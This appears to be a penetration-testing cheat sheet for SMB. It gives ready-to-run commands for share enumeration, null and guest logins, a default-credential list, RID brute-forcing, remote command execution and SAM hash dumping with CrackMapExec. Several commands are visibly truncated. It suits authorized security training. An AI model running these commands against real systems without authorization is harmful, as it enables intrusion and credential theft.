• Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources.

  • The SMB protocol enables the client to communicate with other participants in the same network to access files or services shared with it on the network.

  • An SMB server can provide arbitrary parts of its local file system as shares.

  • Access rights are defined by Access Control Lists (ACL).

  • SMB runs on port 445 TCP by default

SMB Shares Enumeration

  • Run Snaffler from a Windows host to find useful data in shares: .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data

  • Run Scavenger from a Linux host to find useful data in shares: python3 ./ smb -t -u administrator -p Password123 -d testdomain.local

  • Shares enumeration from Windows: net view \MachineName /all

  • CME Shares Enumeration from Linux: sudo crackmapexec smb -u validuser -p validpassword --shares

  • CME Share Spidering from Linux: sudo crackmapexec smb -u validuser -p validpassword -M spider_plus --share sharename

  • SMBMap Share Enumeration from Linux: smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H

  • SMBMap Share Recursive Directory Listing from Linux smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H -R SHARENAME --dir-only

  • Download Shares Recursively from Linux: smbget -u guest -R smb://

SMB NULL Session, Guest and Common Credentials Authentication

  • Guest Authentication: enum4linux -a -u "guest" -p "" <DC IP>

  • Guest Authentication: smbmap -u "guest" -p "" -P 445 -H <DC IP>

  • Guest Authentication: smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

  • NULL Session: smbclient -N -L //<FQDN/IP>

  • NULL Session: crackmapexec smb <FQDN/IP> --shares -u '' -p ''

  • NULL Session: smbmap -u "" -p "" -P 445 -H <DC IP>

  • NULL Session: enum4linux -a -u "" -p "" <DC IP>

  • Check for common SMB credentials, as listed below

Common SMB Credentials


Common Username(s)Common Password





Administrator, admin

(blank), password, administrator, admin


arcserve, backup

tivoli, tmersrvd

tivoli, tmersrvd, admin

backupexec, backup

backupexec, backup, arcada

test, lab, demo

password, test, lab, demo

Enumerating SMB via RPC Client

The rpcclient utility offers us many different requests with which we can execute specific functions on the SMB server to get information.

Command (Query)Description


Server information.


Enumerate all domains that are deployed in the network.


Provides domain, server, and user information of deployed domains.


Enumerates all available shares.


Provides information about a specific share.


Enumerates all domain users.


Provides information about a specific user.

Bruteforcing user RIDs:

  • Oneliner: for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

  • Impacket Samrdump:

CrackMapExec (CME) Utilities


Run commands with CrackMapExec

crackmapexec smb -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Enumerate logged on users with CrackMapExec

crackmapexec smb -u administrator -p 'Password123!' --loggedon-users

Extract Hashes from the SAM Database with CrackMapExec

crackmapexec smb -u administrator -p 'Password123!' --sam

Enumerate Password Policies

crackmapexec smb -u validuser -p validpass --pass-pol

Last updated